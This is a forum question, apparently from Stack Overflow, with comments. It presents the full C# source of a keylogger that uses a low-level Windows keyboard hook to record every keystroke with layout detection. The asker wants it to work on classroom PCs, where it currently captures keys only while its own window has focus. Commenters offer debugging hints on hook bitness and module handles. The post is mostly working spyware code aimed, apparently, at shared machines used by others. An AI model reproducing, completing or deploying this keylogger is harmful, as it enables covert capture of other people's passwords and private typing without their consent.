# Incorrect work of keylogger (C #)

Tags: c#, keyboard, hook

On my computer, and on few of other computers (laptops, if it important) the program works, but on all PCs in our classroom - it works only if the console application window is in focus.

Of course on the PC user does not have full rights, but that in fact should not interfere with low-level hooks? Moreover, I specifically created a user account with limited rights on my laptop and everything worked right.

On some forums I was told that it could be due to the bit width of programs. What do you think about it?

Here is the code of the keylogger class.

**P.S.** Functions GetSymbolENG and GetSymbolRUS is just a switch-case for the Russian layout and additional symbols.

**P.S.S** Sorry for my english.

```
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.IO;
using System.Threading;
//   dll import + keylogger
using System.Windows.Forms;
using System.Runtime.InteropServices;
using System.Diagnostics;

namespace meinhack_
{
    class KeyLogger
    {
        const int WH_KEYBOARD_LL = 13;
        const int HC_ACTION = 0;
        private const int WM_KEYDOWN = 0x0100;
        private static IntPtr _hookID = IntPtr.Zero;
        public static string hookedKeys = "";

        public KeyLogger()
        {
            Console.Out.WriteLine("Hook created...");
        }

        private static IntPtr SetHook(KeyboardProc proc)
        {
            using (Process curProcess = Process.GetCurrentProcess())
            using (ProcessModule curModule = curProcess.MainModule)
            {
                return SetWindowsHookEx(WH_KEYBOARD_LL, proc,
                    GetModuleHandle(curModule.ModuleName), 0);
            }
        }

        public void SetHook()
        {
            Console.Out.WriteLine("Trying to set hook...");
            _hookID = SetHook(Callback);
            Application.Run();
            Console.Out.WriteLine("Hook right...");
         }

        ~KeyLogger()
        {
            UnhookWindowsHookEx(_hookID);
        }        

        public delegate IntPtr KeyboardProc(int nCode, IntPtr wParam, IntPtr lParam);
        KeyboardProc Callback = KeyboardHookCallback;      


        static IntPtr KeyboardHookCallback(int nCode, IntPtr wParam, IntPtr lParam)
        {            
            if (nCode >= 0 && wParam == (IntPtr)WM_KEYDOWN)
            {
                Console.Out.WriteLine("Trying to recognize layout...");
                string text = GetKeyboardLayoutId();
                Console.Out.WriteLine("Layout recognized...");

                int vkCode = Marshal.ReadInt32(lParam);

                Console.Out.WriteLine("Trying to get KeyState of CapsLock and Shift layout...");
                bool capsLock = (((ushort)GetKeyState(0x14)) & 0xffff) != 0;
                bool numLock = (((ushort)GetKeyState(0x90)) & 0xffff) != 0;
                bool scrollLock = (((ushort)GetKeyState(0x91)) & 0xffff) != 0;
                bool shift = (GetAsyncKeyState(Keys.LShiftKey) != 0 || GetAsyncKeyState(Keys.RShiftKey) != 0);
                Console.Out.WriteLine("KeyState of CapsLock and Shift got...");

                Console.Out.WriteLine("Trying to write key...");
                if (text == "RUS") hookedKeys += GetSymbolRUS((Keys)vkCode, shift, capsLock).ToString();
                else hookedKeys += GetSymbolENG((Keys)vkCode, shift, capsLock).ToString();
                Console.Out.WriteLine("Key written...");
            }            
            return CallNextHookEx(_hookID, nCode, wParam, lParam);
        }           

        public string GetHookedKeys()
        {
            return hookedKeys;
        }

        public void ResetHookedKeys()
        {
            hookedKeys = "";
        }

    #region dllimport

    [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
    private static extern IntPtr GetModuleHandle(string lpModuleName);

    [DllImport("user32.dll", CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
    public static extern IntPtr SetWindowsHookEx(int idHook, KeyboardProc lpfn, IntPtr hInstance, int threadId);

    [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
    private static extern IntPtr CallNextHookEx(IntPtr hhk, int nCode, IntPtr wParam, IntPtr lParam);

    [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
    [return: MarshalAs(UnmanagedType.Bool)]
    private static extern bool UnhookWindowsHookEx(IntPtr hhk); 

    [DllImport("kernel32.dll")]
    private static extern IntPtr LoadLibrary(string dllToLoad);

    [DllImport("user32.dll", CharSet = CharSet.Auto)]
    private static extern IntPtr GetKeyboardLayout(int WindowsThreadProcessID);

    [DllImport("user32.dll", CharSet = CharSet.Auto)]
    private static extern int GetWindowThreadProcessId(IntPtr handleWindow, out int lpdwProcessID);

    [DllImport("user32.dll", CharSet = CharSet.Auto)]
    public static extern IntPtr GetForegroundWindow();

    [DllImport("user32.dll", CharSet = CharSet.Auto, ExactSpelling = true, CallingConvention = CallingConvention.Winapi)]
    private static extern short GetKeyState(int keyCode);

    [DllImport("user32.dll", CharSet = CharSet.Auto, ExactSpelling = true, CallingConvention = CallingConvention.Winapi)]
    private static extern short GetAsyncKeyState(Keys key);

    #endregion

    #region recognizeLayout
    private static InputLanguageCollection _InstalledInputLanguages;
    private static int _ProcessId;
    private static string _CurrentInputLanguage;

    private static string GetKeyboardLayoutId()
    {
        _InstalledInputLanguages = InputLanguage.InstalledInputLanguages;

        IntPtr hWnd = GetForegroundWindow();        
        int WinThreadProcId = GetWindowThreadProcessId(hWnd, out _ProcessId);

        IntPtr KeybLayout = GetKeyboardLayout(WinThreadProcId);
        for (int i = 0; i < _InstalledInputLanguages.Count; i++)
        {
            if (KeybLayout == _InstalledInputLanguages[i].Handle)
            {
               _CurrentInputLanguage = _InstalledInputLanguages[i].Culture.ThreeLetterWindowsLanguageName.ToString();
            }
        }
        return _CurrentInputLanguage;
    }        
    #endregion

    }
}
```

Comment: You shown no code, but if you use `SetWindowsHookEx`, then there is a pretty remarkable Remarks (no pun intended) section [here](https://msdn.microsoft.com/en-us/library/windows/desktop/ms644990(v=vs.85).aspx) which explain very well the issues with *bitness*.

Comment: Also using `LoadLibrary("user32.dll")` for *hMod* param seems pretty incorrect.

Comment: @Margaret Bloom, i dont know why it is incorrect but i corrected it and it didn't solve my problem.

Comment: I didn't say it was the problem, I said I seems incorrect. *hMod* should be the module handle of the DLL containing the code of the function hook. Which cannot be *user32.dll*. You are better of troubleshooting the problem by inspecting the returned value of *GetLastError* after *SetWindowsHookEx* or by writing simple test programs in the trouble environment. There's little that we can do.